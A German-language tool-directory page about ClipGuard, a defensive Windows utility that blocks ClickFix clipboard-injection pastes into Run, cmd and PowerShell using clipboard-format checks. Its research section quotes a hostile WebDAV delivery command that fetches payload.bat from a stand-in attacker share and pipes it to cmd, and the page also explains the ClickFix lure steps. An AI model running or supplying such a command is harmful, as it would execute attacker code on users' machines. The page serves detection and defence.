Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ClipGuard — Ein leichtgewichtiges Tool zur Abwehr von Clickfix-Angriffen durch Nutzung von Zwischenablageformatierung mit Prüfungen der Ausführungsoberfläche. | Kitploit
Tools/GitHubGitHub/certainlyp/clipguard
DefensivwerkzeugePhishing-ToolsSocial EngineeringPapers & ForschungLernen & BildungAnti-Bot
GitHubcertainlyp/clipguard

ClipGuard

Ein leichtgewichtiges Tool zur Abwehr von Clickfix-Angriffen durch Nutzung von Zwischenablageformatierung mit Prüfungen der Ausführungsoberfläche.

Repository anzeigen
128vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ClipGuard

Echtzeit-Erkennung von ClickFix-Zwischenablage-Injektionsangriffen unter Windows.

ClipGuard überwacht die Aktivität der Zwischenablage und fängt verdächtige Einfügeoperationen ab, bevor sie ausgeführt werden können – gezielt gegen die ClickFix-Technik, bei der gefälschte Überprüfungsseiten Benutzer dazu verleiten, schädliche Befehle einzufügen.

Das Problem

ClickFix-Angriffe funktionieren wie folgt:

  1. Ein Opfer landet auf einer Seite mit einem gefälschten CAPTCHA- oder Verifizierungsaufforderung
  2. JavaScript kopiert still einen schädlichen Befehl (meistens PowerShell) in die Zwischenablage
  3. Die Seite weist den Benutzer an, Win+R zu drücken, einzufügen (Strg+V) und die Eingabetaste zu drücken
  4. Der Benutzer führt unwissentlich die Nutzlast selbst aus – und umgeht dabei traditionelle Sicherheitskontrollen

Der entscheidende Einblick: Wenn JavaScript über navigator.clipboard.writeText() in die Zwischenablage schreibt, enthält die Zwischenablage nur CF_UNICODETEXT – Wenn ein Benutzer manuell Text von einer Webseite auswählt und kopiert, legt der Browser sowohl CF_UNICODETEXT als auch CF_HTML in die Zwischenablage. ClipGuard verwendet diesen Formatunterschied als eines seiner primären Erkennungssignale.

Wie es funktioniert

ClipGuard läuft in der Systemleiste und schichtet mehrere Erkennungsmechanismen:

  1. Clipboard Provenance Tracking – Hört auf WM_CLIPBOARDUPDATE-Nachrichten und zeichnet den Quellprozess, die vorhandenen Zwischenablage-Formate (CF_HTML vs CF_UNICODETEXT), die Inhaltslänge und eine Vorschau des Inhalts für jede Zwischenablageänderung auf.

  2. Execution Surface Detection – Erkennt, wenn das Vordergrundfenster eine Befehlsausführungsoberfläche ist: der Ausführen-Dialog (Win+R), cmd.exe, powershell.exe, pwsh.exe oder Windows Terminal.

  3. Keyboard Hook (Strg+V-Abfangen) – Ein Low-Level-Tastatur-Hook (WH_KEYBOARD_LL) fängt Strg+V-Tastendrücke ab. Wenn ein Einfügen in eine Ausführungsoberfläche mit aus dem Browser stammendem Zwischenablageinhalt versucht wird, bewertet ClipGuard die Bedrohung.

  4. Format-Based Verdict – Wenn der Zwischenablageinhalt von einem Browser stammt und nur Text enthält (kein CF_HTML), wird er als verdächtig markiert – was auf einen wahrscheinlichen JavaScript-Zwischenablageschreibvorgang und nicht auf eine benutzerinitiierte Kopie hinweist (kein HTML-Indikator). Das Einfügen wird blockiert und der Benutzer sieht einen Alarm mit dem Zwischenablageinhalt, bevor er entscheidet, ob er zulassen oder blockieren möchte.

Demo

Bild

Erkennungslogik

root@kitploit:~
Clipboard updated by browser?
  -- YES: User pastes (Ctrl+V) into execution surface?
       -- YES: Clipboard has CF_UNICODETEXT only (no CF_HTML)?
            -- YES: BLOCK — Suspected ClickFix (JS clipboard write)
            -- NO:  Strict Mode on?
                 -- YES: WARN — User copy, but going to exec surface
                 -- NO:  ALLOW

Unterstützte Ausführungsoberflächen

  • Ausführen-Dialog (Win+R) – erkannt über Fensterklasse #32770 + ComboBox-Unterelement unter explorer.exe
  • cmd.exe – Prozessnamenabgleich
  • powershell.exe / pwsh.exe – Prozessnamenabgleich
  • Windows Terminal (wt.exe) – Prozessnamenabgleich

Überwachte Browser

Edge, Chrome, Firefox, Brave, Opera, Vivaldi, Chromium, Arc

Installation

Voraussetzungen:

  • Windows 10/11
  • .NET 8.0-Laufzeit (https://dotnet.microsoft.com/download/dotnet/8.0)
  • Als Administrator ausführen (erforderlich für den Low-Level-Tastatur-Hook)

Aus dem Quellcode erstellen:

root@kitploit:~
git clone https://github.com/CertainlyP/ClipGuard.git
cd ClipGuard
dotnet build -c Release

Oder laden Sie die kompilierte Binärdatei von der Releases-Seite herunter.

Verwendung

  1. ClipGuard.exe als Administrator ausführen
  2. ClipGuard erscheint in der Systemleiste mit einem grünen Schildsymbol
  3. Rechtsklick auf das Taskleistensymbol für Optionen: Status, Log öffnen, Strenger Modus, Beenden

Wenn ein verdächtiger Einfügevorgang erkannt wird, zeigt ClipGuard einen Alarm mit einer Vorschau des Zwischenablageinhalts, Quellprozess und PID, Zwischenablageformatanalyse und der Option, das Einfügen zu blockieren oder zuzulassen.

Logs werden geschrieben nach %APPDATA%\ClipGuard\shield.log

Einschränkungen

  • Erfordert Administratorrechte für den Tastatur-Hook
  • Blockiert nicht die Ausführung – es fängt das Einfügen ab und warnt den Benutzer
  • Kopier-Buttons auf legitimen Seiten (z.B. GitHub-Codeblöcke) verwenden ebenfalls JS-Zwischenablageschreibvorgänge und lösen Warnungen aus – absichtlich, da der Benutzer vor dem Einfügen in ein Terminal überprüfen sollte
  • Überwacht derzeit nicht Win+R gefolgt von manueller Eingabe (nur Strg+V-Einfügen)

Forschung

Dieses Tool basiert auf originärer Forschung zu ClickFix-Angriffsmechanismen:

  • Zwischenablageformat-Metadaten als Erkennungssignal – Das Vorhandensein von CF_HTML unterscheidet Benutzerkopien von JavaScript-navigator.clipboard.writeText()-Aufrufen
  • WebDAV-basierte ClickFix-Lieferketten – pushd \attacker\share + type payload.bat | cmd-Varianten
  • Fingerprinting von Ausführungsoberflächen – Identifizierung des Ausführen-Dialogs programmatisch über Fensterklasse und Aufzählung von Untersteuerelementen

Lizenz

MIT

Tool herunterladen